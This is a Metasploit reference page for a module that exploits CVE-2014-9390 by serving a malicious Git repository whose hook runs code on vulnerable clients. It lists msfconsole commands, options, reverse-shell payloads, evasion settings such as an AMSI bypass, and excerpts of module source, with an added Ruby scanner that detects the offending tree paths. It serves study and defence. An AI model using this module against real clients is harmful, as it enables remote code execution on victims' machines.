Malicious Git and Mercurial HTTP Server For CVE-2014-9390 - Metasploit


This page contains detailed information about how to use the exploit/multi/http/git_client_command_exec Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Malicious Git and Mercurial HTTP Server For CVE-2014-9390
Module: exploit/multi/http/git_client_command_exec
Source code: modules/exploits/multi/http/git_client_command_exec.rb
Disclosure date: 2014-12-18
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-9390

This module exploits CVE-2014-9390, which affects Git (versions before 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions before 3.2.3) and covers three related vulnerabilities. On operating systems with case-insensitive file systems, such as Windows and OS X, a malicious repository can carry a tree entry that is a case variant of .git; a vulnerable Git client writes its contents into the real .git directory, overwriting sensitive files there (this module plants a hook, selected by GIT_HOOK and defaulting to post-checkout), and arbitrary code executes as soon as the client performs the corresponding action, for example a checkout, against that repository. A second vulnerability with similar characteristics exists in both Git and Mercurial clients on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignored when file names are compared. The third, again with similar characteristics, affects only Mercurial clients on Windows, where MS-DOS-compatible 8.3 "short names" are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work. The module plays the malicious server: it listens on SRVHOST:SRVPORT and serves the hostile repository under GIT_URI (random unless set), so the victim only has to clone (which performs a checkout) from that URL.
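Because the module supplies the hostile tree, the defender-side check is the mirror image: scan a repository's tree paths for components that a vulnerable client's file system would resolve to the metadata directory. The Ruby below is an added example, not code from the Metasploit module or from Git or Mercurial. It models the three behaviours listed above (plain case folding, HFS+ ignorable codepoints, NTFS 8.3 short names together with Win32's stripping of trailing dots and spaces), treats GIT~1 as a collision as well even though the page attributes the 8.3 problem to Mercurial only, and covers .hg alongside .git. The ignorable-codepoint list is the one Git's fix checks for HFS+ and is taken as an assumption here; the sample tree is constructed.

```ruby
# Added example (not part of the Metasploit module): flag tree paths that a
# vulnerable Git or Mercurial client would write into its own metadata
# directory (.git or .hg) on a case-insensitive, HFS+ or NTFS file system.
require 'set'

# Codepoints HFS+ ignores when comparing file names. Assumption: this is the
# list Git's fix (is_hfs_dotgit) checks; extend it if your platform differs.
HFS_IGNORABLE = Set.new([
  0x200c, 0x200d, 0x200e, 0x200f,                 # ZW(N)J, LRM, RLM
  0x202a, 0x202b, 0x202c, 0x202d, 0x202e,         # bidi embedding/override
  0x206a, 0x206b, 0x206c, 0x206d, 0x206e, 0x206f, # deprecated format chars
  0xfeff                                          # zero width no-break space
]).freeze

# Metadata directories whose hooks/config files yield code execution.
META_DIRS = %w[.git .hg].freeze

# File system behaviours modelled, in the order findings are reported.
FILESYSTEMS = %i[case_insensitive hfs_plus ntfs].freeze

# Fold a single path component the way the given file system would before
# comparing it against an existing directory entry.
def fold_component(name, fs)
  s = name.dup
  # HFS+ drops these codepoints entirely during name comparison.
  s = s.each_char.reject { |c| HFS_IGNORABLE.include?(c.ord) }.join if fs == :hfs_plus
  # Win32 strips trailing dots and spaces, so ".git." opens ".git".
  s = s.sub(/[. ]+\z/, '') if fs == :ntfs
  # All three file systems compare case-insensitively.
  s.downcase
end

# Return the metadata dir this component resolves to on +fs+, or nil.
def metadata_dir?(component, fs)
  folded = fold_component(component, fs)
  META_DIRS.each do |dir|
    return dir if folded == dir
    # NTFS 8.3 short name: ".git" becomes GIT~1, ".hg" becomes HG~1.
    # Assumption: ~1..~9 are all treated as collisions, since the number
    # depends on what else already exists in the directory.
    short = /\A#{Regexp.escape(dir.delete('.'))}~[1-9]\z/
    return dir if fs == :ntfs && folded.match?(short)
  end
  nil
end

# Scan tree paths (as produced by `git ls-tree -r --name-only <commit>`).
# Returns a hash of offending path => list of file systems on which it collides.
def suspicious_paths(paths)
  paths.each_with_object({}) do |path, out|
    hits = []
    path.split('/').each do |component|
      FILESYSTEMS.each { |fs| hits << fs if metadata_dir?(component, fs) }
    end
    out[path] = hits.uniq unless hits.empty?
  end
end

# Constructed sample tree: a few benign entries plus one path per variant.
SAMPLE_TREE = [
  'README.md',
  'src/main.c',
  '.gitignore',                      # benign: not equal to ".git"
  'docs/git.md',                     # benign
  '.Git/hooks/post-checkout',        # case variant (the class this module exploits)
  ".g\u200cit/hooks/post-checkout",  # ZERO WIDTH NON-JOINER inside ".git" (HFS+)
  'GIT~1/hooks/post-checkout',       # NTFS 8.3 short name for ".git"
  '.git./config',                    # trailing dot stripped by Win32
  '.HG/hgrc'                         # Mercurial case variant
].freeze

if $PROGRAM_NAME == __FILE__
  suspicious_paths(SAMPLE_TREE).each do |path, fs_list|
    puts "REJECT #{path.inspect}: resolves to a metadata dir on #{fs_list.join(', ')}"
  end
end
```

Feed it the output of git ls-tree -r --name-only for the commit being accepted and it makes a usable pre-receive gate for repositories that unpatched clients will consume; patched clients refuse the same names when writing the working tree, which is why the fixed versions listed above are the real remedy.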

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
  • screen-effects: Module may show something on the screen (Example: a window pops up).

Basic Usage


msf > use exploit/multi/http/git_client_command_exec
msf exploit(git_client_command_exec) > exploit


Msfconsole Usage


Here is how the multi/http/git_client_command_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/git_client_command_exec

msf6 exploit(multi/http/git_client_command_exec) > show info

       Name: Malicious Git and Mercurial HTTP Server For CVE-2014-9390
     Module: exploit/multi/http/git_client_command_exec
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-12-18

Provided by:
  Jon Hart <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows Powershell

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  GIT      true             yes       Exploit Git clients
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits CVE-2014-9390, which affects Git (versions less 
  than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions 
  less than 3.2.3) and describes three vulnerabilities. On operating 
  systems which have case-insensitive file systems, like Windows and 
  OS X, Git clients can be convinced to retrieve and overwrite 
  sensitive configuration files in the .git directory which can allow 
  arbitrary code execution if a vulnerable client can be convinced to 
  perform certain actions (for example, a checkout) against a 
  malicious Git repository. A second vulnerability with similar 
  characteristics also exists in both Git and Mercurial clients, on 
  HFS+ file systems (Mac OS X) only, where certain Unicode codepoints 
  are ignorable. The third vulnerability with similar characteristics 
  only affects Mercurial clients on Windows, where Windows "short 
  names" (MS-DOS-compatible 8.3 format) are supported. Today this 
  module only truly supports the first vulnerability (Git clients on 
  case-insensitive file systems) but has the functionality to support 
  the remaining two with a little work.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-9390
  https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
  http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html
  http://article.gmane.org/gmane.linux.kernel/1853266
  https://github.com/blog/1938-vulnerability-announced-update-your-git-clients
  https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
  http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29
  http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e
  http://selenic.com/repo/hg-stable/rev/6dad422ecc5a

Module Options


This is a complete list of options available in the multi/http/git_client_command_exec exploit:

msf6 exploit(multi/http/git_client_command_exec) > show options

Module options (exploit/multi/http/git_client_command_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   GIT      true             yes       Exploit Git clients
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/http/git_client_command_exec exploit:

msf6 exploit(multi/http/git_client_command_exec) > show advanced

Module advanced options (exploit/multi/http/git_client_command_exec):

   Name                                    Current Setting  Required  Description
   ----                                    ---------------  --------  -----------
   ContextInformationFile                                   no        The information file that contains context information
   DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
   EnableContextEncoding                   false            no        Use transient context when encoding payloads
   GIT_HOOK                                post-checkout    no        The Git hook to use for exploitation
   GIT_URI                                                  no        The URI to use as the malicious Git instance (empty for random)
   ListenerComm                                             no        The specific communication channel to use for this service
   MERCURIAL                               false            no        Enable experimental Mercurial support
   MERCURIAL_HOOK                          update           no        The Mercurial hook to use for exploitation
   MERCURIAL_URI                                            no        The URI to use as the malicious Mercurial instance (empty for random)
   Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
   Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true             yes       Execute powershell without interaction
   Powershell::persist                     false            yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true             yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                no        Prepend seconds of sleep
   Powershell::remove_comspec              false            yes       Produce script calling powershell directly
   Powershell::strip_comments              true             yes       Strip comments
   Powershell::strip_whitespace            false            yes       Strip whitespace
   Powershell::sub_funcs                   false            yes       Substitute function names
   Powershell::sub_vars                    true             yes       Substitute variable names
   Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
   SSLCipher                                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                          false            no        Enable SSL/TLS-level compression
   SendRobots                              false            no        Return a robots.txt file if asked for one
   URIHOST                                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                                 false            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/git_client_command_exec module can exploit:

msf6 exploit(multi/http/git_client_command_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows Powershell

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/git_client_command_exec exploit:

msf6 exploit(multi/http/git_client_command_exec) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_perl                          normal  No     Unix Command Shell, Bind TCP (via Perl)
   1  payload/cmd/unix/bind_perl_ipv6                     normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2  payload/cmd/unix/generic                            normal  No     Unix Command, Generic Command Execution
   3  payload/cmd/unix/reverse_bash                       normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   4  payload/cmd/unix/reverse_perl                       normal  No     Unix Command Shell, Reverse TCP (via Perl)
   5  payload/cmd/unix/reverse_perl_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via perl)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/git_client_command_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/git_client_command_exec) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Must specify at least one GIT and/or MERCURIAL


Here is a relevant code snippet related to the "Must specify at least one GIT and/or MERCURIAL" error message:

      git: { files: {}, trigger: nil },
      mercurial: { files: {}, trigger: nil }
    }

    unless datastore['GIT'] || datastore['MERCURIAL']
      fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
    end

    setup_git
    setup_mercurial

GIT_URI must start with a /


Here is a relevant code snippet related to the "GIT_URI must start with a /" error message:

  def setup_git
    return unless datastore['GIT']
    # URI must start with a /
    unless git_uri && git_uri =~ /^\//
      fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
    end
    # sanity check the malicious hook:
    if datastore['GIT_HOOK'].blank?
      fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')
    end

GIT_HOOK must not be blank


Here is a relevant code snippet related to the "GIT_HOOK must not be blank" error message:

    unless git_uri && git_uri =~ /^\//
      fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
    end
    # sanity check the malicious hook:
    if datastore['GIT_HOOK'].blank?
      fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')
    end

    # In .git/hooks/ directory, specially named files are shell scripts that
    # are executed when particular events occur.  For example, if
    # .git/hooks/post-checkout was an executable shell script, a git client

MERCURIAL_URI must start with a /


Here is a relevant code snippet related to the "MERCURIAL_URI must start with a /" error message:

  def setup_mercurial
    return unless datastore['MERCURIAL']
    # URI must start with a /
    unless mercurial_uri && mercurial_uri =~ /^\//
      fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
    end
    # sanity check the malicious hook
    if datastore['MERCURIAL_HOOK'].blank?
      fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
    end

MERCURIAL_HOOK must not be blank


Here is a relevant code snippet related to the "MERCURIAL_HOOK must not be blank" error message:

    unless mercurial_uri && mercurial_uri =~ /^\//
      fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
    end
    # sanity check the malicious hook
    if datastore['MERCURIAL_HOOK'].blank?
      fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
    end
    # we fake the Mercurial HTTP protocol such that we are compliant as possible but
    # also as simple as possible so that we don't have to support all of the protocol
    # complexities.  Taken from:
    #   http://mercurial.selenic.com/wiki/HttpCommandProtocol


Authors


  • Jon Hart <jon_hart[at]rapid7.com>

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
